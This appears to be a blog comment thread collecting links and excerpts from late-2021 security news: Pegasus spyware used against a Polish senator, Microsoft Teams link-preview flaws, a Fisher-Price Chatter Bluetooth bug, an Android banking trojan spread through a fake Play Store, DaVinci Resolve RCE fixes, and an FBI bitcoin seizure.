https://www.zdnet.com/article/nso-spyware-used-to-hack-polish-politicians-wife-of-khashoggi-un-war-crimes-investigator-and-more/#ftag=RSSbaffb68
Spyware from Israeli tech company NSO Group has been implicated in the hack of a leading opposition politician in Poland and several others, according to University of Toronto nonprofit Citizen Lab. In partnership with the Associated Press, Citizen Lab revealed on Thursday that Polish Senator Krzysztof Brejza was hacked using NSO Group’s Pegasus spyware 33 times between April 26, 2019 and October 23, 2019.
Tomi Engdahl says:
Researchers Disclose Unpatched Vulnerabilities in Microsoft Teams Software https://thehackernews.com/2021/12/researchers-disclose-unpatched.html
Microsoft said it won’t be fixing or is pushing patches to a later date for three of the four security flaws uncovered in its Teams business communication platform earlier this March. The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could “allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and DoS’ing their Teams app/channels.”
Tomi Engdahl says:
Fisher-Price’s Chatter phone has a simple but problematic Bluetooth bug https://techcrunch.com/2021/12/22/chatter-phone-bluetooth-bug/
As nostalgia goes, the Fisher-Price Chatter phone doesn’t disappoint.
The classic retro kids’ toy was given a modern revamp for the holiday season with the new release for adults which, unlike the original toy designed for kids, can make and receive calls over Bluetooth using a nearby smartphone. The Chatter didn’t spend long on sale; the phone sold out quickly as the waitlists piled up. But security researchers in the U.K. immediately spotted a potential problem. With just the online instruction manual to go on, the researchers feared that a design flaw could allow someone to use the Chatter to eavesdrop.
Tomi Engdahl says:
Android banking trojan spreads via fake Google Play Store page https://www.bleepingcomputer.com/news/security/android-banking-trojan-spreads-via-fake-google-play-store-page/
An Android banking trojan targeting Itaú Unibanco, a large financial services provider in Brazil with 55 million customers globally, has deployed an unusual trick to spread to devices. The actors have set up a page that looks very close to Android’s official Google Play app store to trick visitors into thinking they are installing the app from a trustworthy service. See also:
https://blog.cyble.com/2021/12/23/malicious-app-targets-major-brazilian-bank-itau-unibanco/
Tomi Engdahl says:
Blackmagic fixes critical DaVinci Resolve code execution flaws https://www.bleepingcomputer.com/news/security/blackmagic-fixes-critical-davinci-resolve-code-execution-flaws/
Blackmagic Software has recently addressed two security vulnerabilities in the highly popular DaVinci Resolve software that would allow attackers to gain code execution on unpatched systems. The two remote code execution (RCE) security flaws, tracked as CVE-2021-40417 and CVE-2021-40418, were discovered by Cisco Talos security researchers and are rated with a CVSSv3 severity score of 9.8/10. They’re both caused by weaknesses found in DaVinci Resolve’s DPDecoder service and are triggered by a heap-based buffer overflow when decoding a video file or an incorrect UUID when parsing video files.
Tomi Engdahl says:
FBI traces and grabs back $150 million theft that was turned into bitcoins https://blog.malwarebytes.com/crypto/2021/12/fbi-traces-and-grabs-back-150-million-theft-that-was-turned-into-bitcoins/
On December 1, 2021, the Tokyo police arrested an employee of Sony Life Insurance on suspicion of fraudulently obtaining 17 billion yen through an illegal money transfer from an overseas unit. The funds were embezzled by Sony employee Rei Ishii, who pretended to conduct a legal fund transfer in May 2021. He allegedly transferred the money from SA Reinsurance Ltd’s bank account to a different bank account overseas, by falsifying transaction instructions, which caused the funds to be transferred to an account that Ishii controlled at a bank in La Jolla, California. He then quickly converted the funds to bitcoins, as criminals do.